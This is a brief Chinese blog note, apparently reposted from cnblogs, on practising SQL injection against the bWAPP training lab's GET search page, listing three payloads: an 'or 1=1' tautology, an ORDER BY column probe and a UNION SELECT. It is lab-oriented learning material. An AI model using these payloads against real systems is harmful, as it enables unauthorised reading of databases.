数据库
首页 > 数据库> > sql注入1----sql injection get search

sql注入1----sql injection get search

作者:互联网

使用靶机为bwapp

 

查询所有的结果

 1111' or 1=1 #

查询所有的数据内容行

' order by 7 #

查看列数

1' UNION SELECT 1,2,3,4,5,6 #

 

标签:search,get,UNION,查询,1111,sql
来源: https://www.cnblogs.com/wendy-0901/p/16378452.html